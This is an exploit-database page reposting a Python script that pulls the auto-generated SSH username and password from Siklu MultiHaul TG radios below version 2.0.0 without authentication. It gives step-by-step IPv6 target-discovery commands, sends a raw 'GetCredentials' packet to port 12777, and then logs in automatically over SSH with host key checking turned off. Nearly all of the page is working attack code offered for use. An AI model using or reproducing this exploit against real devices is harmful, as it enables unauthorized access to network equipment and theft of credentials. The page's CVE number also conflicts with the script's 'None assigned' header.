Advertisement






Siklu MultiHaul TG series < 2.0.0 unauthenticated credential disclosure

CVE Category Price Severity
CVE-2021-39291 CWE-255 $5000 High
Author Risk Exploitation Type Date
Researcher Name Critical Remote 2024-03-28
CPE
cpe:/o:siklu:siklu_multihaul:2.0.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 0.19312 0.85

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030069

Below is a copy:

Siklu MultiHaul TG series < 2.0.0 unauthenticated credential disclosure
# Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure
# Date: 28-02-2024
# Exploit Author: semaja2
# Vendor Homepage: https://siklu.com/
# Software Link: https://partners.siklu.com/home/frontdoor
# Version: < 2.0.0
# Tested on: 2.0.0
# CVE : None assigned
#
# Instructions
# 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device
# `ping6 -I en7 -c 2 ff02::1`
# 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address
# `ip -6 neigh show dev en7`
# 3. Execute script
# `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7`
# 4. Enjoy the access



import socket
import sys
import os

address = str(sys.argv[1])  # the target
port = 12777

# Captured command, sends "GetCredentials" to obtain random generated username/password
cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000")

addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM)
(family, socktype, proto, canonname, sockaddr) = addrinfo[0]
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
s.connect(sockaddr)
s.send(cmd)
data = s.recv(200)
s.close()
output = "".join(map(chr, data))

# Split output, then remove trailing noise as string length is always 35
splits = output.split('#')
username = splits[1][slice(0, 35, 1)]
password = splits[2][slice(0, 35, 1)]
print('Username: ', username)
print('Password: ', password)
os.system("sshpass -p {password} ssh -o StrictHostKeychecking=no {address} -l {username}".format(address = address, username = username, password = password))

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum